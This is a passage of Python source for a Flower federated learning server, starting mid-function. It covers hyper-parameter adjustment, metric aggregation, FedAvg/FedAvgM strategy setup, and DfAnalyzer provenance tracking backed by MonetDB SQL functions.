== \"Increment by\":\n adjusted_value = old_value + factor\n elif operation_text == \"Decrement by\":\n adjusted_value = old_value - factor\n elif operation_text == \"Multiply by\":\n adjusted_value = old_value * factor\n elif operation_text == \"Divide by\":\n adjusted_value = old_value / factor\n\n if type(old_value) == int:\n adjusted_value = int(adjusted_value)\n\n return adjusted_value\n\n def dynamically_adjust_hyper_parameters(self, phase: str, config: dict) -> dict:\n config_name = None\n hyper_parameters_to_adjust = None\n if phase == \"train\":\n config_name = \"Fit Config\"\n hyper_parameters_to_adjust = self.get_attribute(\n \"training_hyper_parameters_dynamic_adjustment_settings\"\n )[\"to_adjust\"]\n elif phase == \"test\":\n config_name = \"Evaluate Config\"\n hyper_parameters_to_adjust = self.get_attribute(\n \"testing_hyper_parameters_dynamic_adjustment_settings\"\n )[\"to_adjust\"]\n adjustments_policies_settings = self.get_attribute(\n \"adjustments_policies_settings\"\n )\n if hyper_parameters_to_adjust:\n for (\n hyper_parameter,\n adjustment_policy,\n ) in hyper_parameters_to_adjust.items():\n if (\n hyper_parameter in config\n and adjustment_policy in adjustments_policies_settings\n ):\n hyper_parameter_old_value = config[hyper_parameter]\n hyper_parameter_new_value = self.adjust_hyper_parameter_value(\n hyper_parameter_old_value, adjustment_policy\n )\n config.update({hyper_parameter: hyper_parameter_new_value})\n # Log the Dynamic Configuration Adjustment Notice (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1}] {2} Dynamically Adjusted (Eligible FL Round).\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n config_name,\n )\n self.log_message(message, \"INFO\")\n return config\n\n def on_fit_config_fn(self, fl_round: int) -> Optional[dict]:\n \"\"\"Training configuration function called by Flower before each training round.\"\"\"\n # Update the Current FL Round (Necessary Workaround on Flower v1.1.0).\n starting_time = time.ctime()\n\n self.set_attribute(\"fl_round\", fl_round)\n # Log the Current FL Round (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0}] Current FL Round: {1}\".format(\n self.get_attribute(\"server_id\"), self.get_attribute(\"fl_round\")\n )\n self.log_message(message, \"INFO\")\n # Get the Training Configuration.\n fit_config = self.get_attribute(\"fit_config\")\n # Update the Training Configuration's Current FL Round.\n fit_config.update({\"fl_round\": self.get_attribute(\"fl_round\")})\n # Dynamically Adjust the Training Configuration's Hyper-parameters (If Enabled and Eligible).\n dynamically_adjusted = False\n if self.is_enabled_hyper_parameters_dynamic_adjustment(\"train\"):\n if self.is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n \"train\"\n ):\n fit_config = self.dynamically_adjust_hyper_parameters(\n \"train\", fit_config\n )\n dynamically_adjusted = True\n\n # Store the Training Configuration Changes.\n self.set_attribute(\"fit_config\", fit_config)\n # Log the Training Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Fit Config: {2}\".format(\n self.get_attribute(\"server_id\"), fit_config[\"fl_round\"], fit_config\n )\n self.log_message(message, \"DEBUG\")\n # Replace All Values of None Type to \"None\" String (Necessary Workaround on Flower v1.1.0).\n fit_config = {k: (\"None\" if v is None else v) for k, v in fit_config.items()}\n\n t7 = Task(7 + 6 * (fl_round - 1), dataflow_tag, 
\"TrainingConfig\")\n if fl_round == 1:\n t7.add_dependency(\n Dependency(\n [\"serverconfig\", \"strategy\", \"serverevaluationaggregation\"],\n [\"1\", \"2\", \"0\"],\n )\n )\n else:\n t7.add_dependency(\n Dependency(\n [\"serverconfig\", \"strategy\", \"serverevaluationaggregation\"],\n [\"1\", \"2\", str(12 + 6 * (fl_round - 2))],\n )\n )\n\n t7.begin()\n\n attributes = [\n \"shuffle\",\n \"batch_size\",\n \"initial_epoch\",\n \"epochs\",\n \"steps_per_epoch\",\n \"validation_split\",\n \"validation_batch_size\",\n ]\n\n to_dfanalyzer = [\n fl_round,\n starting_time,\n time.ctime(),\n ] + [fit_config.get(attr, 0) for attr in attributes]\n\n t7_input = DataSet(\"iTrainingConfig\", [Element(to_dfanalyzer)])\n t7.add_dataset(t7_input)\n t7_output = DataSet(\n \"oTrainingConfig\",\n [Element([fl_round, dynamically_adjusted])],\n )\n t7.add_dataset(t7_output)\n t7.end()\n\n # Return the Training Configuration to be Sent to All Participating Clients.\n return fit_config\n\n def on_evaluate_config_fn(self, fl_round: int) -> Optional[dict]:\n \"\"\"Testing configuration function called by Flower before each testing round.\"\"\"\n # Update the Current FL Round (Necessary Workaround on Flower v1.1.0).\n self.set_attribute(\"fl_round\", fl_round)\n # Log the Current FL Round (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0}] Current FL Round: {1}\".format(\n self.get_attribute(\"server_id\"), self.get_attribute(\"fl_round\")\n )\n self.log_message(message, \"INFO\")\n # Get the Testing Configuration.\n evaluate_config = self.get_attribute(\"evaluate_config\")\n # Update the Testing Configuration's Current FL Round.\n evaluate_config.update({\"fl_round\": self.get_attribute(\"fl_round\")})\n # Dynamically Adjust the Testing Configuration's Hyper-parameters (If Enabled and Eligible).\n if self.is_enabled_hyper_parameters_dynamic_adjustment(\"test\"):\n if self.is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n \"test\"\n ):\n evaluate_config = self.dynamically_adjust_hyper_parameters(\n \"test\", evaluate_config\n )\n # Store the Testing Configuration Changes.\n self.set_attribute(\"evaluate_config\", evaluate_config)\n # Log the Testing Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Evaluate Config: {2}\".format(\n self.get_attribute(\"server_id\"),\n evaluate_config[\"fl_round\"],\n evaluate_config,\n )\n self.log_message(message, \"DEBUG\")\n # Replace All Values of None Type to \"None\" String (Necessary Workaround on Flower v1.1.0).\n evaluate_config = {\n k: (\"None\" if v is None else v) for k, v in evaluate_config.items()\n }\n # Return the Testing Configuration to be Sent to All Participating Clients.\n\n t10 = Task(\n 10 + 6 * (fl_round - 1),\n dataflow_tag,\n \"EvaluationConfig\",\n dependency=Task(\n 9 + 6 * (fl_round - 1), dataflow_tag, \"ServerTrainingAggregation\"\n ),\n )\n t10.begin()\n attributes = [\"batch_size\", \"steps\"]\n to_dfanalyzer = [evaluate_config.get(attr, 0) for attr in attributes]\n\n t10_input = DataSet(\"iEvaluationConfig\", [Element(to_dfanalyzer)])\n t10.add_dataset(t10_input)\n t10_output = DataSet(\"oEvaluationConfig\", [Element([])])\n t10.add_dataset(t10_output)\n t10.end()\n\n # Return the Testing Configuration to be Sent to All Participating Clients.\n return evaluate_config\n\n def fit_metrics_aggregation_fn(\n self, training_metrics: List[Tuple[int, Metrics]]\n ) -> Optional[Metrics]:\n \"\"\"Metrics aggregation function called by Flower after every training 
round.\"\"\"\n t9 = Task(\n 9 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ServerTrainingAggregation\",\n dependency=Task(\n 8 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ClientTraining\",\n ),\n )\n starting_time = time.ctime()\n t9.begin()\n\n # Get the Total Number of Participating Clients.\n total_num_clients = len(training_metrics)\n # Get the Training Metrics Names.\n metrics_names_list = list(training_metrics[0][1].keys())\n # Multiply Each Training Metrics Value of Each Participating Client\n # By His Number of Training Examples (Client's Contribution).\n metrics_products_list = []\n for metric_name in metrics_names_list:\n metric_product = [\n num_examples * metric[metric_name]\n for num_examples, metric in training_metrics\n ]\n metrics_products_list.append(metric_product)\n # Get the Total Number of Training Examples (of All Participating Clients).\n total_num_examples = sum([num_examples for num_examples, _ in training_metrics])\n # Aggregate the Training Metrics (Weighted Average).\n aggregated_metrics = {}\n for metric_index in range(0, len(metrics_names_list)):\n metric_name = metrics_names_list[metric_index]\n weighted_average_metric = (\n sum(metrics_products_list[metric_index]) / total_num_examples\n )\n aggregated_metrics[metric_name] = weighted_average_metric\n\n # Log the Aggregated Training Metrics (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1} | {2}] Aggregated Training Metrics (Weighted Average): {3}\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n \"\".join(\n [\n str(total_num_clients),\n \" Clients\" if total_num_clients > 1 else \" Client\",\n ]\n ),\n aggregated_metrics,\n )\n self.log_message(message, \"INFO\")\n\n to_dfanalyzer = [\n self.get_attribute(\"fl_round\"),\n total_num_clients,\n total_num_examples,\n aggregated_metrics[\"sparse_categorical_accuracy\"],\n aggregated_metrics[\"loss\"],\n aggregated_metrics[\"val_sparse_categorical_accuracy\"],\n aggregated_metrics[\"val_loss\"],\n aggregated_metrics[\"fit_time\"],\n starting_time,\n time.ctime(),\n ]\n t9_output = DataSet(\"oServerTrainingAggregation\", [Element(to_dfanalyzer)])\n t9.add_dataset(t9_output)\n t9.end()\n # Return the Aggregated Training Metrics.\n return aggregated_metrics\n\n def evaluate_metrics_aggregation_fn(\n self, testing_metrics: List[Tuple[int, Metrics]]\n ) -> Optional[Metrics]:\n \"\"\"Metrics aggregation function called by Flower after every testing round.\"\"\"\n # Get the Total Number of Participating Clients.\n t12 = Task(\n 12 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ServerEvaluationAggregation\",\n dependency=Task(\n 11 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"clientevaluation\",\n ),\n )\n\n starting_time = time.ctime()\n t12.begin()\n\n total_num_clients = len(testing_metrics)\n # Get the Testing Metrics Names.\n metrics_names_list = list(testing_metrics[0][1].keys())\n # Multiply Each Testing Metrics Value of Each Participating Client\n # By His Number of Testing Examples (Client's Contribution).\n metrics_products_list = []\n for metric_name in metrics_names_list:\n metric_product = [\n num_examples * metric[metric_name]\n for num_examples, metric in testing_metrics\n ]\n metrics_products_list.append(metric_product)\n # Get the Total Number of Testing Examples (of All Participating Clients).\n total_num_examples = sum([num_examples for num_examples, _ in testing_metrics])\n # Aggregate the Testing 
Metrics (Weighted Average).\n aggregated_metrics = {}\n for metric_index in range(0, len(metrics_names_list)):\n metric_name = metrics_names_list[metric_index]\n weighted_average_metric = (\n sum(metrics_products_list[metric_index]) / total_num_examples\n )\n aggregated_metrics[metric_name] = weighted_average_metric\n\n # Log the Aggregated Testing Metrics (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1} | {2}] Aggregated Testing Metrics (Weighted Average): {3}\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n \"\".join(\n [\n str(total_num_clients),\n \" Clients\" if total_num_clients > 1 else \" Client\",\n ]\n ),\n aggregated_metrics,\n )\n self.log_message(message, \"INFO\")\n\n to_dfanalyzer = [\n self.get_attribute(\"fl_round\"),\n total_num_clients,\n total_num_examples,\n aggregated_metrics[\"sparse_categorical_accuracy\"],\n aggregated_metrics[\"loss\"],\n aggregated_metrics[\"evaluate_time\"],\n starting_time,\n time.ctime(),\n ]\n\n t12_output = DataSet(\"oServerEvaluationAggregation\", [Element(to_dfanalyzer)])\n t12.add_dataset(t12_output)\n t12.end()\n # Return the Aggregated Testing Metrics.\n return aggregated_metrics\n\n def instantiate_server_aggregation_strategy(self) -> Strategy:\n # Get Server Config File.\n server_config_file = self.get_attribute(\"server_config_file\")\n # Init ConfigParser Object.\n cp = ConfigParser()\n cp.optionxform = str\n cp.read(filenames=server_config_file, encoding=\"utf-8\")\n fl_settings = self.get_attribute(\"fl_settings\")\n server_aggregation_strategy = None\n t2 = Task(2, dataflow_tag, \"Strategy\")\n\n t2.begin()\n if fl_settings[\"server_aggregation_strategy\"] == \"FedAvg\":\n # FedAvg - Federated Averaging Aggregation Strategy.\n server_aggregation_strategy = FedAvg(\n fraction_fit=fl_settings[\"fraction_fit\"],\n fraction_evaluate=fl_settings[\"fraction_evaluate\"],\n min_fit_clients=fl_settings[\"min_fit_clients\"],\n min_evaluate_clients=fl_settings[\"min_evaluate_clients\"],\n min_available_clients=fl_settings[\"min_available_clients\"],\n evaluate_fn=self.evaluate_fn,\n on_fit_config_fn=self.on_fit_config_fn,\n on_evaluate_config_fn=self.on_evaluate_config_fn,\n accept_failures=fl_settings[\"accept_rounds_containing_failures\"],\n initial_parameters=self.get_attribute(\n \"initial_global_model_parameters\"\n ),\n fit_metrics_aggregation_fn=self.fit_metrics_aggregation_fn,\n evaluate_metrics_aggregation_fn=self.evaluate_metrics_aggregation_fn,\n )\n t2_input = DataSet(\"iStrategy\", [Element([0, 0])])\n t2.add_dataset(t2_input)\n\n elif fl_settings[\"server_aggregation_strategy\"] == \"FedAvgM\":\n # Parse 'FedAvgM Settings'.\n fed_avg_m_settings = self.parse_config_section(cp, \"FedAvgM Settings\")\n # FedAvgM - Federated Averaging with Server Momentum Aggregation Strategy.\n server_aggregation_strategy = FedAvgM(\n fraction_fit=fl_settings[\"fraction_fit\"],\n fraction_evaluate=fl_settings[\"fraction_evaluate\"],\n min_fit_clients=fl_settings[\"min_fit_clients\"],\n min_evaluate_clients=fl_settings[\"min_evaluate_clients\"],\n min_available_clients=fl_settings[\"min_available_clients\"],\n evaluate_fn=self.evaluate_fn,\n on_fit_config_fn=self.on_fit_config_fn,\n on_evaluate_config_fn=self.on_evaluate_config_fn,\n accept_failures=fl_settings[\"accept_rounds_containing_failures\"],\n initial_parameters=self.get_attribute(\n \"initial_global_model_parameters\"\n ),\n fit_metrics_aggregation_fn=self.fit_metrics_aggregation_fn,\n 
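# FedAvgM reuses the same weighted-average aggregation callbacks as FedAvg; only the server-side learning rate and momentum below are new.\n                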
evaluate_metrics_aggregation_fn=self.evaluate_metrics_aggregation_fn,\n server_learning_rate=fed_avg_m_settings[\"server_learning_rate\"],\n server_momentum=fed_avg_m_settings[\"server_momentum\"],\n )\n\n attributes = [\"server_learning_rate\", \"server_momentum\"]\n to_dfanalyzer = [fed_avg_m_settings.get(attr, None) for attr in attributes]\n t2_input = DataSet(\"iStrategy\", [Element(to_dfanalyzer)])\n t2.add_dataset(t2_input)\n t2_output = DataSet(\"oStrategy\", [Element([])])\n t2.add_dataset(t2_output)\n t2.end()\n # Unbind ConfigParser Object (Garbage Collector).\n del cp\n return server_aggregation_strategy\n\n def instantiate_flower_server(self) -> Server:\n # Instantiate Simple Client Manager.\n simple_client_manager = self.instantiate_simple_client_manager()\n # Instantiate Server's Aggregation Strategy.\n server_aggregation_strategy = self.instantiate_server_aggregation_strategy()\n # Instantiate Flower Server.\n flower_server = Server(\n client_manager=simple_client_manager, strategy=server_aggregation_strategy\n )\n return flower_server\n\n def instantiate_flower_server_config(self) -> ServerConfig:\n fl_settings = self.get_attribute(\"fl_settings\")\n # Instantiate Flower Server's Config.\n flower_server_config = ServerConfig(\n num_rounds=fl_settings[\"num_rounds\"],\n round_timeout=fl_settings[\"round_timeout_in_seconds\"],\n )\n return flower_server_config\n\n def get_ssl_certificates(self) -> Optional[Tuple[bytes]]:\n fl_settings = self.get_attribute(\"fl_settings\")\n ssl_certificates = None\n if fl_settings[\"enable_ssl\"]:\n ssl_settings = self.get_attribute(\"ssl_settings\")\n prefix_path = Path(\"./FlowerServer_\" + str(self.get_attribute(\"server_id\")))\n ca_certificate_bytes = prefix_path.joinpath(\n ssl_settings[\"ca_certificate_file\"]\n ).read_bytes()\n server_certificate_bytes = prefix_path.joinpath(\n ssl_settings[\"server_certificate_file\"]\n ).read_bytes()\n server_rsa_private_key_bytes = prefix_path.joinpath(\n ssl_settings[\"server_rsa_private_key_file\"]\n ).read_bytes()\n ssl_certificates = (\n ca_certificate_bytes,\n server_certificate_bytes,\n server_rsa_private_key_bytes,\n )\n return ssl_certificates\n\n def start_flower_server(self) -> None:\n # Get gRPC Server's Listen IP Address and Port.\n grpc_listen_ip_address_and_port = self.get_grpc_listen_ip_address_and_port()\n # Get Flower Server.\n flower_server = self.get_attribute(\"flower_server\")\n # Get Flower Server's Config.\n flower_server_config = self.get_attribute(\"flower_server_config\")\n # Get gRPC Max Message Length (in Bytes).\n grpc_max_message_length_in_bytes = self.get_grpc_max_message_length_in_bytes()\n # Get Secure Socket Layer (SSL) Certificates (SSL-Enabled Secure Connection).\n ssl_certificates = self.get_ssl_certificates()\n # Start Flower Server.\n start_server(\n server_address=grpc_listen_ip_address_and_port,\n server=flower_server,\n config=flower_server_config,\n grpc_max_message_length=grpc_max_message_length_in_bytes,\n certificates=ssl_certificates,\n )\n\n\ndef main() -> None:\n # Begin.\n\n ##########\n # DfAnalyzer Instrumentation\n df = Dataflow(dataflow_tag)\n\n tf1 = Transformation(\"ServerConfig\")\n tf1_input = Set(\n \"iServerConfig\",\n SetType.INPUT,\n [\n Attribute(\"server_id\", AttributeType.NUMERIC),\n Attribute(\"address\", AttributeType.TEXT),\n Attribute(\"max_message_length_in_bytes\", AttributeType.TEXT),\n Attribute(\"num_rounds\", AttributeType.NUMERIC),\n Attribute(\"round_timeout_in_seconds\", AttributeType.NUMERIC),\n 
Attribute(\"accept_rounds_with_failures\", AttributeType.TEXT),\n Attribute(\"enable_ssl\", AttributeType.TEXT),\n Attribute(\"enable_dynamic_adjustment\", AttributeType.TEXT),\n Attribute(\"server_aggregation_strategy\", AttributeType.TEXT),\n Attribute(\"fraction_fit\", AttributeType.NUMERIC),\n Attribute(\"fraction_evaluate\", AttributeType.NUMERIC),\n Attribute(\"min_fit_clients\", AttributeType.NUMERIC),\n Attribute(\"min_evaluate_clients\", AttributeType.NUMERIC),\n Attribute(\"min_available_clients\", AttributeType.NUMERIC),\n ],\n )\n tf1_output = Set(\"oServerConfig\", SetType.OUTPUT, [])\n tf1.set_sets([tf1_input, tf1_output])\n df.add_transformation(tf1)\n\n tf2 = Transformation(\"Strategy\")\n\n tf2_input = Set(\n \"iStrategy\",\n SetType.INPUT,\n [\n Attribute(\"server_learning_rate\", AttributeType.NUMERIC),\n Attribute(\"server_momentum\", AttributeType.NUMERIC),\n ],\n )\n tf2_output = Set(\"oStrategy\", SetType.OUTPUT, [])\n tf2.set_sets([tf2_input, tf2_output])\n df.add_transformation(tf2)\n\n tf3 = Transformation(\"DatasetLoad\")\n tf3_input = Set(\n \"iDatasetLoad\",\n SetType.INPUT,\n [\n Attribute(\"client_id\", AttributeType.NUMERIC),\n Attribute(\"loading_time\", AttributeType.TEXT),\n ],\n )\n tf3_output = Set(\"oDatasetLoad\", SetType.OUTPUT, [])\n tf3.set_sets([tf3_input, tf3_output])\n df.add_transformation(tf3)\n\n tf4 = Transformation(\"ModelConfig\")\n tf4_input = Set(\n \"iModelConfig\",\n SetType.INPUT,\n [\n Attribute(\"model\", AttributeType.TEXT),\n Attribute(\"optimizer\", AttributeType.TEXT),\n Attribute(\"loss_function\", AttributeType.TEXT),\n Attribute(\"loss_weights\", AttributeType.TEXT),\n Attribute(\"weighted_metrics\", AttributeType.TEXT),\n Attribute(\"run_eagerly\", AttributeType.TEXT),\n Attribute(\"steps_per_execution\", AttributeType.NUMERIC),\n Attribute(\"jit_compile\", AttributeType.TEXT),\n Attribute(\"input_shape\", AttributeType.TEXT),\n Attribute(\"alpha\", AttributeType.NUMERIC),\n Attribute(\"include_top\", AttributeType.TEXT),\n Attribute(\"weights\", AttributeType.TEXT),\n Attribute(\"input_tensor\", AttributeType.TEXT),\n Attribute(\"pooling\", AttributeType.TEXT),\n Attribute(\"classes\", AttributeType.NUMERIC),\n Attribute(\"classifier_activation\", AttributeType.TEXT),\n ],\n )\n\n tf4_output = Set(\n \"oModelConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf4.set_sets([tf4_input, tf4_output])\n df.add_transformation(tf4)\n\n tf5 = Transformation(\"OptimizerConfig\")\n tf5_input = Set(\n \"iOptimizerConfig\",\n SetType.INPUT,\n [\n Attribute(\"learning_rate\", AttributeType.NUMERIC),\n Attribute(\"momentum\", AttributeType.NUMERIC),\n Attribute(\"nesterov\", AttributeType.TEXT),\n Attribute(\"name\", AttributeType.TEXT),\n ],\n )\n\n tf5_output = Set(\n \"oOptimizerConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf5.set_sets([tf5_input, tf5_output])\n df.add_transformation(tf5)\n\n tf6 = Transformation(\"LossConfig\")\n tf6_input = Set(\n \"iLossConfig\",\n SetType.INPUT,\n [\n Attribute(\"from_logits\", AttributeType.TEXT),\n Attribute(\"ignore_class\", AttributeType.TEXT),\n Attribute(\"reduction\", AttributeType.TEXT),\n Attribute(\"name\", AttributeType.TEXT),\n ],\n )\n tf6_output = Set(\n \"oLossConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf6.set_sets([tf6_input, tf6_output])\n df.add_transformation(tf6)\n\n tf7 = Transformation(\"TrainingConfig\")\n tf7_input = Set(\n \"iTrainingConfig\",\n SetType.INPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n 
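# starting_time / ending_time are TEXT because timestamps are captured as time.ctime() strings elsewhere in this file.\n            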
Attribute(\"ending_time\", AttributeType.TEXT),\n Attribute(\"shuffle\", AttributeType.TEXT),\n Attribute(\"batch_size\", AttributeType.NUMERIC),\n Attribute(\"initial_epoch\", AttributeType.NUMERIC),\n Attribute(\"epochs\", AttributeType.NUMERIC),\n Attribute(\"steps_per_epoch\", AttributeType.TEXT),\n Attribute(\"validation_split\", AttributeType.NUMERIC),\n Attribute(\"validation_batch_size\", AttributeType.TEXT),\n ],\n )\n\n tf7_output = Set(\n \"oTrainingConfig\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"dynamically_adjusted\", AttributeType.TEXT),\n ],\n )\n\n tf1_output.set_type(SetType.INPUT)\n tf1_output.dependency = tf1._tag\n\n tf2_output.set_type(SetType.INPUT)\n tf2_output.dependency = tf2._tag\n\n tf7.set_sets([tf1_output, tf2_output, tf7_input, tf7_output])\n\n df.add_transformation(tf7)\n\n tf8 = Transformation(\"ClientTraining\")\n\n tf8_output = Set(\n \"oClientTraining\",\n SetType.OUTPUT,\n [\n Attribute(\"client_id\", AttributeType.NUMERIC),\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"training_time\", AttributeType.NUMERIC),\n Attribute(\"size_x_train\", AttributeType.NUMERIC),\n Attribute(\"global_current_parameters\", AttributeType.TEXT),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"val_loss\", AttributeType.NUMERIC),\n Attribute(\"val_accuracy\", AttributeType.TEXT),\n Attribute(\"local_weights\", AttributeType.TEXT),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf3_output.set_type(SetType.INPUT)\n tf3_output.dependency = tf3._tag\n\n tf4_output.set_type(SetType.INPUT)\n tf4_output.dependency = tf4._tag\n\n tf5_output.set_type(SetType.INPUT)\n tf5_output.dependency = tf5._tag\n\n tf6_output.set_type(SetType.INPUT)\n tf6_output.dependency = tf6._tag\n\n tf7_output.set_type(SetType.INPUT)\n tf7_output.dependency = tf7._tag\n\n tf8.set_sets(\n [\n tf3_output,\n tf4_output,\n tf5_output,\n tf6_output,\n tf7_output,\n tf8_output,\n ]\n )\n df.add_transformation(tf8)\n\n tf9 = Transformation(\"ServerTrainingAggregation\")\n tf9_output = Set(\n \"oServerTrainingAggregation\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"total_num_clients\", AttributeType.NUMERIC),\n Attribute(\"total_num_examples\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"val_accuracy\", AttributeType.NUMERIC),\n Attribute(\"val_loss\", AttributeType.NUMERIC),\n Attribute(\"training_time\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf8_output.set_type(SetType.INPUT)\n tf8_output.dependency = tf8._tag\n\n tf9.set_sets([tf8_output, tf9_output])\n df.add_transformation(tf9)\n\n tf10 = Transformation(\"EvaluationConfig\")\n tf10_input = Set(\n \"iEvaluationConfig\",\n SetType.INPUT,\n [\n Attribute(\"batch_size\", AttributeType.NUMERIC),\n Attribute(\"steps\", AttributeType.TEXT),\n ],\n )\n\n tf10_output = Set(\n \"oEvaluationConfig\",\n SetType.OUTPUT,\n [],\n )\n\n tf9_output.set_type(SetType.INPUT)\n tf9_output.dependency = tf9._tag\n\n tf10.set_sets([tf9_output, tf10_input, tf10_output])\n df.add_transformation(tf10)\n\n tf11 = Transformation(\"ClientEvaluation\")\n\n tf11_output = Set(\n \"oClientEvaluation\",\n SetType.OUTPUT,\n [\n Attribute(\"client_id\", 
AttributeType.NUMERIC),\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"evaluation_time\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"num_testing_examples\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf10_output.set_type(SetType.INPUT)\n tf10_output.dependency = tf10._tag\n\n tf11.set_sets([tf10_output, tf11_output])\n df.add_transformation(tf11)\n\n tf12 = Transformation(\"ServerEvaluationAggregation\")\n\n tf12_output = Set(\n \"oServerEvaluationAggregation\",\n SetType.OUTPUT,\n [\n Attribute(\"server_round\", AttributeType.NUMERIC),\n Attribute(\"total_num_clients\", AttributeType.NUMERIC),\n Attribute(\"total_num_examples\", AttributeType.NUMERIC),\n Attribute(\"accuracy\", AttributeType.NUMERIC),\n Attribute(\"loss\", AttributeType.NUMERIC),\n Attribute(\"evaluation_time\", AttributeType.NUMERIC),\n Attribute(\"starting_time\", AttributeType.TEXT),\n Attribute(\"ending_time\", AttributeType.TEXT),\n ],\n )\n\n tf11_output.set_type(SetType.INPUT)\n tf11_output.dependency = tf11._tag\n\n tf12.set_sets([tf11_output, tf12_output])\n df.add_transformation(tf12)\n\n tf12_output.set_type(SetType.INPUT)\n tf12_output.dependency = tf12._tag\n\n tf7 = Transformation(\"TrainingConfig\")\n\n tf7.set_sets([tf12_output])\n df.add_transformation(tf7)\n\n df.save()\n tries = 0\n while tries < 100:\n try:\n conn = pymonetdb.connect(\n username=\"monetdb\",\n password=\"monetdb\",\n hostname=\"localhost\",\n port=\"50000\",\n database=\"dataflow_analyzer\",\n )\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"\n CREATE OR REPLACE FUNCTION check_metrics (fl_round int)\n RETURNS table (training_time double, accuracy_training double, loss_training double, \n val_accuracy double, val_loss double, accuracy_evaluation double, loss_evaluation double)\n BEGIN\n RETURN\n SELECT\n st.training_time,\n st.accuracy,\n st.loss,\n st.val_accuracy,\n st.val_loss,\n se.accuracy,\n se.loss\n FROM\n oservertrainingaggregation as st\n JOIN \n oserverevaluationaggregation as se\n ON\n st.server_round = se.server_round\n WHERE\n st.server_round = fl_round;\n END;\"\"\"\n )\n\n cursor.execute(\n \"\"\"CREATE FUNCTION update_hyperparameters (accuracy_goal double,\n limit_training_time double,\n limit_accuracy_change double,\n fl_round int)\n RETURNS boolean\n BEGIN\n RETURN\n SELECT \n CASE WHEN (SELECT DISTINCT dynamically_adjusted FROM otrainingconfig\n WHERE server_round BETWEEN fl_round - 2 AND fl_round - 1 AND dynamically_adjusted = 'True') IS NOT NULL THEN 0\n WHEN (SELECT DISTINCT\n CASE\n WHEN (last_value(accuracy_training) OVER () < accuracy_goal\n AND last_value(training_time) OVER () < limit_training_time*60 \n AND (last_value(accuracy_training) OVER () > first_value(accuracy_training) OVER ()\n AND last_value(val_accuracy) OVER () > first_value(val_accuracy) OVER ())\n AND last_value(accuracy_training) OVER () - first_value(accuracy_training) OVER () < limit_accuracy_change)\n THEN 1\n ELSE 0\n END\n FROM\n (\n SELECT * FROM check_metrics(fl_round - 2)\n UNION \n SELECT * FROM check_metrics(fl_round - 1)) AS t1) THEN 1\n ELSE 0\n END;\n END;\"\"\"\n )\n\n conn.commit()\n cursor.close()\n conn.close()\n break\n except Exception as e:\n time.sleep(1)\n tries += 1\n\n ##########\n # Parse Flower Server Arguments.\n ag = ArgumentParser(description=\"Flower Server Arguments\")\n ag.add_argument(\n 
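# Example invocation (hypothetical paths): python flower_server.py --server_id 1 --server_config_file config/flower_server.cfg\n        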
\"--server_id\", type=int, required=True, help=\"Server ID (no default)\"\n )\n ag.add_argument(\n \"--server_config_file\",\n type=Path,\n required=True,\n help=\"Server Config File (no default)\",\n )\n parsed_args = ag.parse_args()\n # Get Flower Server Arguments.\n server_id = int(parsed_args.server_id)\n server_config_file = Path(parsed_args.server_config_file)\n # Init FlowerServer Object.\n fs = FlowerServer(server_id, server_config_file)\n # Parse Flower Server Config File.\n fs.parse_flower_server_config_file()\n # Instantiate and Set Logger.\n logger = fs.load_logger()\n fs.set_attribute(\"logger\", logger)\n # Load and Set Initial Global Model Parameters.\n initial_global_model_parameters = fs.load_initial_global_model_parameters()\n fs.set_attribute(\"initial_global_model_parameters\", initial_global_model_parameters)\n # Load and Set Initial Fit Config.\n fit_config = fs.load_initial_fit_config()\n fs.set_attribute(\"fit_config\", fit_config)\n # Load and Set Initial Evaluate Config.\n evaluate_config = fs.load_initial_evaluate_config()\n fs.set_attribute(\"evaluate_config\", evaluate_config)\n # Instantiate and Set Flower Server.\n flower_server = fs.instantiate_flower_server()\n fs.set_attribute(\"flower_server\", flower_server)\n # Instantiate and Set Flower Server's Config.\n flower_server_config = fs.instantiate_flower_server_config()\n fs.set_attribute(\"flower_server_config\", flower_server_config)\n # Start Flower Server.\n fs.start_flower_server()\n # Unbind Objects (Garbage Collector).\n del ag\n del fs\n # End.\n 